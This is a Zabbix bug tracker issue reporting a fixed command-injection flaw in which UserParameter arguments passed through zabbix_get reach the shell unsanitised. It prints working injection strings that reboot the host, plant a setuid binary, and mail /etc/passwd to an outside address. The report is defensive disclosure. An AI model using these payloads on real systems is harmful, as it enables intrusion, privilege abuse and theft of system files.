Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-790

Userparameter parameters aren't sanitised, allowing arbitrary command execution from zabbix_get

    Details

    • Type: Incident report
    • Status: Closed
    • Priority: Blocker
    • Resolution: Fixed
    • Affects Version/s: 1.4.5, 1.6.7, 1.9.0 (alpha)
    • Fix Version/s: 1.9.0 (alpha)
    • Component/s: Agent (G)
    • Labels:
      None
    • Environment:
      Ubuntu 8.10

      Description

      If you create a UserParameter which takes variable parameters, then by running zabbix_get you can use it to execute arbitrary commands as user zabbix on a machine running zabbix_agent; I'm not sure what benefit there might be to running arbitrary commands as user zabbix, but it's a concern nonetheless.

      I'm running the 1.4.6 version of zabbix included with Ubuntu 8.10, so this might have been fixed since, but I downloaded the 1.6.2 source and I don't see any sign of the zabbix_agent code sanitising the parameters passed to a UserParameter command.

      For example, if I add a user parameter I found on a web site for disk monitoring:

      UserParameter=custom.vfs.dev.write[*],grep $1 /proc/diskstats | head -1 | awk '

      {print $$8}

      '

      That's innocuous by itself, but any user can run zabbix_get with command lines like these:

      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|/sbin/reboot]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|cp /usr/bin/whoami /home/foo/tmp ; chmod a+xs /home/foo/tmp/whoami]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|mail foo@bar.com < /etc/passwd]"

      They can execute any program (reboot probably won't let zabbix run it, but some machines might), copy any arbitrary program and make it setuid zabbix, access any restricted file that zabbix might have access to, or mail themselves any file on that machine that zabbix can read.

      I'm not quite sure what the best solution to this would be, but at a minimum zabbix_agent should reject any key strings containing |, ;, >, <, ", $, &, \, spaces, or other special shell characters. Even putting " around the $1 in the UserParameter definition isn't a workaround, because you can pass " characters as part of the key in the zabbix_get call.

        Attachments

          Issue Links

            Activity

              People

              • Assignee:
                sasha Alexander Vladishev
                Reporter:
                movieman Mark Grant
              • Votes:
                3 Vote for this issue
                Watchers:
                3 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: